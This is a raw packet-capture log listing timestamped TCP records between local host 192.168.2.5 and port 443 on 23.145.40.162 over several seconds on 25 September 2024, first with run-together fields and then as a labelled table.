                                                                      Sep 25, 2024 16:02:20.703366995 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.703372002 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.703401089 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.705018997 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.705029011 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.705079079 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.705084085 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.728591919 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.728604078 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.728701115 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.728710890 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.744724989 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.744734049 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.744813919 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.744823933 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.750771999 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.750781059 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.750802040 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.750863075 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.750890970 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.750905991 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.751557112 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.751566887 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.751636028 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.751650095 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.772063017 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.772075891 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.772130013 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.772147894 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.792891026 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.792911053 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.792978048 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.792987108 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.793613911 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.793623924 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.793646097 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.793675900 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.793680906 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.793700933 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.797796965 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.797806978 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.797863960 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.797871113 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.818969011 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.818983078 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.819103003 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.819152117 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.819658041 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.819669008 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.819736004 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.819756031 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.819766998 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.834904909 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.834944010 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.835019112 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.835051060 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.835063934 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.841243029 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.841283083 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.841336966 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.841346979 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.841375113 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.841378927 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.841389894 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.841422081 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.841428041 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.841449976 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.842155933 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.842216015 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.842222929 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.842412949 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.842469931 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.842474937 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.843293905 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.843348980 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.843354940 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.861329079 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.861488104 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.861500025 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.883471966 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.883595943 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.883606911 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.883734941 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.883745909 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.883820057 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.883825064 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.883841991 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.883887053 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.883892059 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.883929968 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.883934021 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.884648085 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.884716988 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.884727955 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.885492086 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.885565042 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.885584116 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.904843092 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.904956102 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.904978991 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.909823895 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.909914017 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.909934044 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.925359964 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.925437927 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.925446033 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.931005001 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.931066990 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.931071997 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.931154966 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.931201935 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.931205988 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.931246996 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.931266069 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.931313038 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.931477070 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.931493044 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:20.931510925 CEST49741443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:20.931515932 CEST4434974123.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:21.025077105 CEST49742443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:21.025116920 CEST4434974223.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:21.025182962 CEST49742443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:21.027443886 CEST49742443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:21.027456045 CEST4434974223.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:21.799849033 CEST4434974223.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:21.799957037 CEST49742443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:21.803422928 CEST49742443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:21.803441048 CEST4434974223.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:21.803714991 CEST4434974223.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:21.806524038 CEST49742443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:21.806564093 CEST49742443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:21.806567907 CEST4434974223.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:22.175898075 CEST4434974223.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:22.175971985 CEST4434974223.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:22.176052094 CEST49742443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:22.176523924 CEST49742443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:22.176542997 CEST4434974223.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:22.176556110 CEST49742443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:22.176562071 CEST4434974223.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:22.183535099 CEST49743443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:22.183578968 CEST4434974323.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:22.183645010 CEST49743443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:22.183902979 CEST49743443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:22.183916092 CEST4434974323.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:22.787055016 CEST4434974323.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:22.787138939 CEST49743443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:22.788588047 CEST49743443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:22.788599014 CEST4434974323.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:22.788840055 CEST4434974323.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:22.789563894 CEST49743443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:22.789592981 CEST49743443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:22.789628029 CEST4434974323.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:23.074373960 CEST4434974323.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:23.074441910 CEST4434974323.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:23.074541092 CEST49743443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:23.074580908 CEST49743443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:23.074598074 CEST4434974323.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:23.074615002 CEST49743443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:23.074620962 CEST4434974323.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:23.080796957 CEST49744443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:23.080816984 CEST4434974423.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:23.080913067 CEST49744443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:23.081176996 CEST49744443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:23.081185102 CEST4434974423.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:23.664676905 CEST4434974423.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:23.664859056 CEST49744443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:23.666105986 CEST49744443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:23.666120052 CEST4434974423.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:23.666363955 CEST4434974423.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:23.667224884 CEST49744443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:23.667260885 CEST49744443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:23.667265892 CEST4434974423.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:23.949548960 CEST4434974423.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:23.949620008 CEST4434974423.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:23.949748993 CEST49744443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:23.949783087 CEST4434974423.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:23.949798107 CEST49744443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:23.949804068 CEST4434974423.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:23.949834108 CEST49744443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:23.949839115 CEST4434974423.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:23.960567951 CEST49745443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:23.960618973 CEST4434974523.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:23.960725069 CEST49745443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:23.961137056 CEST49745443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:23.961158037 CEST4434974523.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:24.555859089 CEST4434974523.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:24.556200981 CEST49745443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:24.557387114 CEST49745443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:24.557394028 CEST4434974523.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:24.557677984 CEST4434974523.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:24.558598995 CEST49745443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:24.558599949 CEST49745443192.168.2.523.145.40.162
                                                                      Sep 25, 2024 16:02:24.558615923 CEST4434974523.145.40.162192.168.2.5
                                                                      Sep 25, 2024 16:02:24.992031097 CEST4434974523.145.40.162192.168.2.5
Timestamp                             Source Port  Dest Port  Source IP      Dest IP
Sep 25, 2024 16:02:24.992094994 CEST  443    49745  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:24.992254972 CEST  49745  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:24.992961884 CEST  49745  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:24.992961884 CEST  49745  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:24.992980957 CEST  443    49745  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:24.992990017 CEST  443    49745  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:24.995821953 CEST  49746  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:24.995843887 CEST  443    49746  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:24.995994091 CEST  49746  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:24.996428013 CEST  49746  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:24.996439934 CEST  443    49746  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:25.602960110 CEST  443    49746  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:25.603102922 CEST  49746  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:25.604368925 CEST  49746  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:25.604381084 CEST  443    49746  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:25.605357885 CEST  443    49746  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:25.615149021 CEST  49746  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:25.615185976 CEST  49746  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:25.615199089 CEST  443    49746  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:25.892869949 CEST  443    49746  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:25.892983913 CEST  443    49746  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:25.893028021 CEST  49746  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:25.893028021 CEST  49746  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:25.893062115 CEST  443    49746  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:25.893110037 CEST  49746  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:25.893117905 CEST  443    49746  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:25.899348974 CEST  49747  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:25.899378061 CEST  443    49747  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:25.899432898 CEST  49747  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:25.899696112 CEST  49747  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:25.899702072 CEST  443    49747  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:26.494271994 CEST  443    49747  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:26.494414091 CEST  49747  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:26.536303997 CEST  49747  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:26.536329031 CEST  443    49747  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:26.536901951 CEST  443    49747  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:26.568528891 CEST  49747  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:26.570302010 CEST  49747  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:26.570311069 CEST  443    49747  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:26.857024908 CEST  443    49747  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:26.857188940 CEST  443    49747  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:26.857242107 CEST  49747  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:26.857273102 CEST  443    49747  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:26.857287884 CEST  49747  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:26.857297897 CEST  443    49747  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:26.857306957 CEST  49747  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:26.857310057 CEST  443    49747  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:26.943144083 CEST  49748  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:26.943212032 CEST  443    49748  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:26.943281889 CEST  49748  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:26.943619013 CEST  49748  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:26.943633080 CEST  443    49748  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:27.538300037 CEST  443    49748  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:27.538374901 CEST  49748  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:27.539895058 CEST  49748  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:27.539907932 CEST  443    49748  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:27.540390015 CEST  443    49748  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:27.541377068 CEST  49748  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:27.541377068 CEST  49748  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:27.541491032 CEST  443    49748  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:27.820450068 CEST  443    49748  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:27.820661068 CEST  443    49748  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:27.820820093 CEST  49748  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:27.820820093 CEST  49748  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:27.820868969 CEST  443    49748  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:27.820890903 CEST  49748  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:27.820898056 CEST  443    49748  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:27.823782921 CEST  49749  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:27.823827982 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:27.827346087 CEST  49749  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:27.827689886 CEST  49749  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:27.827709913 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:28.596733093 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:28.596863985 CEST  49749  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:28.598108053 CEST  49749  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:28.598119020 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:28.598371983 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:28.599107981 CEST  49749  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:28.599137068 CEST  49749  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:28.599143982 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:28.922749043 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:28.922776937 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:28.922843933 CEST  49749  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:28.922863960 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:28.964518070 CEST  49749  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:28.966144085 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:28.966161013 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:28.966253042 CEST  49749  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:28.966269016 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:28.966463089 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:28.966497898 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:28.966512918 CEST  49749  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:28.966523886 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:28.966545105 CEST  49749  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:29.011416912 CEST  49749  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:29.012375116 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:29.012391090 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:29.012458086 CEST  49749  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:29.012470961 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:29.026698112 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:29.026710987 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:29.026774883 CEST  49749  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:29.026794910 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:29.026806116 CEST  49749  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:29.052071095 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:29.052083969 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:29.052135944 CEST  49749  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:29.052155018 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:29.052176952 CEST  49749  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:29.053031921 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:29.053040981 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:29.053088903 CEST  49749  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:29.053100109 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:29.057323933 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:29.057332993 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:29.057385921 CEST  49749  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:29.057399035 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:29.057423115 CEST  49749  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:29.057832956 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:29.057869911 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:29.057895899 CEST  49749  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:29.057903051 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:29.057923079 CEST  49749  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:29.093719959 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:29.093802929 CEST  49749  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:29.093816042 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:29.093859911 CEST  49749  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:29.094002962 CEST  49749  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:29.094019890 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:29.094032049 CEST  49749  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:29.094038010 CEST  443    49749  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:29.157758951 CEST  49750  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:29.157809973 CEST  443    49750  23.145.40.162  192.168.2.5
Sep 25, 2024 16:02:29.157881975 CEST  49750  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:29.158210993 CEST  49750  443    192.168.2.5    23.145.40.162
Sep 25, 2024 16:02:29.158227921 CEST  443    49750  23.145.40.162  192.168.2.5
